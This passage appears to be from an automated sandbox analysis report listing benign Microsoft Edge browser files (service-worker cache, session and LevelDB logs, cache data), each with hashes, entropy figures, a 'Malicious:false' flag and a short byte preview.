                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):189113
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.3879873834484115
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:hwQTre3UoWwinb7lK4mL/fBTr6fmv0khcly9JULUxNLk:fsWwinlUL/pX6ZkSKk
                                                                                                                                                                                                                                                                                    MD5:94B1460E19D5583E130B7A253031D195
                                                                                                                                                                                                                                                                                    SHA1:A799638F706878CDB4BCA003E0DA53DDBA057B6D
                                                                                                                                                                                                                                                                                    SHA-256:B7B8DFC416F6A63C9855A59085B6155ADBC589EFEC263E3AB060692666000BD5
                                                                                                                                                                                                                                                                                    SHA-512:E5F90EFBD3B18F00D611D238136E186C792413B65F92725CF306DB12E3D32F4155138815D65F80CE57D2B0CF8EF34B3A820870C569C03920F3F6C493F96F9D8F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0....z3.................;.....x.`........,T.8..`,.....L`.....,T...`......L`......RcBw<.....exports...Rc..J.....module....Rc..R+....define....Rbjo.n....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....4..{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4d667.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):5651
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.3964310524107555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:zIG93Ebqdpy0G9Xp+at+ViVYokE6Ll9iSrK17qcv4ZAS3s6h3:/EGdQ9Xp+8KiuDbLl9iSrKZqyMt3x3
                                                                                                                                                                                                                                                                                    MD5:F5835788E7D38BFF5CE5AAB6BBAE6477
                                                                                                                                                                                                                                                                                    SHA1:72C87BFDE2518F5C3AB29E712A646A7DE0E7E99F
                                                                                                                                                                                                                                                                                    SHA-256:84F7D06CE754A0A7CA0801C88D2E659580613E176D1E0D9392F102247E806097
                                                                                                                                                                                                                                                                                    SHA-512:781DEB4B206C396CD5CC2B1EEA8A9A2C257E9172DF6E1D1A0CA03BB028293120AABE23C7F49262DF4768BE77AF1A9BCD15BDC0100923A69D93669A96F53AC5D9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................#.b................next-map-id.1.Cnamespace-a7ee2153_93f8_439f_b476_efb21ff04ddc-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................n+.0.................map-0-shd_sweeper.){.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.s.h.c.r.b.c.p.-.c.,.p.r.g.-.e.h.p.s.b.h.v.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.6.0.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.i.l.f.r.e.-.c.l.i.c.k.,.1.s.-.p.r.2.-.f.f.o.,.1.s.-.w.p.o.-.p.r.g.2.-.2.c.f.r.e.h.,.1.s.-.w.p.o.-.p.r.g.2.-.u.i.t.a.p.1.,.p.r.g.-.p.r.2.-.f.r.e.2.c.,.p.r.g.-.p.r.2.-.f.r.e.c.l.i.c.k.,.1.s.-.n.t.f.2.-.e.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.083069260025029
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iUU49yq2P923oH+TcwtrQMxIFUt8dGVI1Zmw+dIxRkwO923oH+TcwtrQMFLJ:iUUv4YebCFUt8dGC1/+dIn5LYebtJ
                                                                                                                                                                                                                                                                                    MD5:2016712A91DD94C8F8069DFBBAA927EF
                                                                                                                                                                                                                                                                                    SHA1:F3188786932E64B288DC3D554643D4854C2D3848
                                                                                                                                                                                                                                                                                    SHA-256:708BB40C799541C6E41320EB5481E1AC46F5682DBE9A0C1CEF3CDA3028049C77
                                                                                                                                                                                                                                                                                    SHA-512:FBB9F73DEFC87A1BA5205AAB20069D643667F498884D23C84E9CDBE769748B71103B6532974E6192D530B6FDE72DBEE06DDB768FB1862D5C2C6D43B21A5B5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.801 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-08:47:12.802 1070 Recovering log #3.2024/12/27-08:47:12.805 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.083069260025029
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iUU49yq2P923oH+TcwtrQMxIFUt8dGVI1Zmw+dIxRkwO923oH+TcwtrQMFLJ:iUUv4YebCFUt8dGC1/+dIn5LYebtJ
                                                                                                                                                                                                                                                                                    MD5:2016712A91DD94C8F8069DFBBAA927EF
                                                                                                                                                                                                                                                                                    SHA1:F3188786932E64B288DC3D554643D4854C2D3848
                                                                                                                                                                                                                                                                                    SHA-256:708BB40C799541C6E41320EB5481E1AC46F5682DBE9A0C1CEF3CDA3028049C77
                                                                                                                                                                                                                                                                                    SHA-512:FBB9F73DEFC87A1BA5205AAB20069D643667F498884D23C84E9CDBE769748B71103B6532974E6192D530B6FDE72DBEE06DDB768FB1862D5C2C6D43B21A5B5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.801 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-08:47:12.802 1070 Recovering log #3.2024/12/27-08:47:12.805 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379780834218525

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.851401501332651
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:3mrhs4cS2KeyektpsAF4unx/gtLp3X2amEtG1ChqGi0XQKkOAM4:3mNs4mozFGLp2FEkChlPAHOp
                                                                                                                                                                                                                                                                                    MD5:D541BED773913D111DE0D3EB142DA83C
                                                                                                                                                                                                                                                                                    SHA1:5EBAD332BE50B817DFCADE4E02912951A9E0F295
                                                                                                                                                                                                                                                                                    SHA-256:AB6DD0DCD5C1E459D58A59A6CC47EB3C4BC2F0BE4DE07CD0638526605627FF5C
                                                                                                                                                                                                                                                                                    SHA-512:C6042FE7AC9F052813E87792392F1FC76EFF82B0DB302ED8245328C0DAAAB5743722E151860C083C2C8EF29B01BE2EC7FD829927493FFBE7D1643F001A00A95A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SNSS........[..............[........".[..............[..........[..........[..........[......!...[..................................[...[..1..,....[..$...a7ee2153_93f8_439f_b476_efb21ff04ddc....[..........[.......U..........[......[..........................[......................5..0....[..&...{98952893-68FF-4A5D-A164-705C709ED3DB}......[..........[.............................[..............[..........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......b.^.@*..c.^.@*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141173486590786
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLjXYVq2P923oH+Tcwt7Uh2ghZIFUt8doLjXYgZmw+doLjXYIkwO923oH+Tcwts:i6IVv4YebIhHh2FUt8d6Ig/+d6II5LYz
                                                                                                                                                                                                                                                                                    MD5:D69A88FD269C027E6E01018237510C5C
                                                                                                                                                                                                                                                                                    SHA1:9A5C3B51525F1AD073AEA3CFADAA8E8F880D641A
                                                                                                                                                                                                                                                                                    SHA-256:70CB12898C6B4F74BAD519DA672E6B9A14775C622DF3036A433D501FD193BF79
                                                                                                                                                                                                                                                                                    SHA-512:16BA76172851D47E67CBF84689A4A6ECBEDDFDBF11FE2C419309FC006E796C8E42235228C5DC7E2F89507809F5497602BB339A48A8A55FDA16F035DB10A294FC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.758 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-08:47:11.758 440 Recovering log #3.2024/12/27-08:47:11.758 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141173486590786
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLjXYVq2P923oH+Tcwt7Uh2ghZIFUt8doLjXYgZmw+doLjXYIkwO923oH+Tcwts:i6IVv4YebIhHh2FUt8d6Ig/+d6II5LYz
                                                                                                                                                                                                                                                                                    MD5:D69A88FD269C027E6E01018237510C5C
                                                                                                                                                                                                                                                                                    SHA1:9A5C3B51525F1AD073AEA3CFADAA8E8F880D641A
                                                                                                                                                                                                                                                                                    SHA-256:70CB12898C6B4F74BAD519DA672E6B9A14775C622DF3036A433D501FD193BF79
                                                                                                                                                                                                                                                                                    SHA-512:16BA76172851D47E67CBF84689A4A6ECBEDDFDBF11FE2C419309FC006E796C8E42235228C5DC7E2F89507809F5497602BB339A48A8A55FDA16F035DB10A294FC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.758 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-08:47:11.758 440 Recovering log #3.2024/12/27-08:47:11.758 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221097062353496
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ieWv4YebvqBQFUt8dey/+de+P5LYebvqBvJ:T04YebvZg8MQ+BLYebvk
                                                                                                                                                                                                                                                                                    MD5:0ECE0007BC8E33E3152A6FB60B09B712
                                                                                                                                                                                                                                                                                    SHA1:81E4A7F35E70AE0DC34743BE5EED13C43499A648
                                                                                                                                                                                                                                                                                    SHA-256:59F1376C3191077CCADC9CC1EF68A6110AC55F43718FFAC8ED772854A3A6659A
                                                                                                                                                                                                                                                                                    SHA-512:D44D902389058C0A93D9A4E16A4B5960B590819F7690B124B3D47B9243498E2DF78F396CE3948C30273C362AA9F216AEB89F507A0E23C36FAC63A7B171D4B081
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.810 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.811 8f4 Recovering log #3.2024/12/27-08:47:12.815 8f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221097062353496
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ieWv4YebvqBQFUt8dey/+de+P5LYebvqBvJ:T04YebvZg8MQ+BLYebvk
                                                                                                                                                                                                                                                                                    MD5:0ECE0007BC8E33E3152A6FB60B09B712
                                                                                                                                                                                                                                                                                    SHA1:81E4A7F35E70AE0DC34743BE5EED13C43499A648
                                                                                                                                                                                                                                                                                    SHA-256:59F1376C3191077CCADC9CC1EF68A6110AC55F43718FFAC8ED772854A3A6659A
                                                                                                                                                                                                                                                                                    SHA-512:D44D902389058C0A93D9A4E16A4B5960B590819F7690B124B3D47B9243498E2DF78F396CE3948C30273C362AA9F216AEB89F507A0E23C36FAC63A7B171D4B081
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.810 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.811 8f4 Recovering log #3.2024/12/27-08:47:12.815 8f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6fb43621-4445-45c4-a72f-25f26868b8bc.tmp

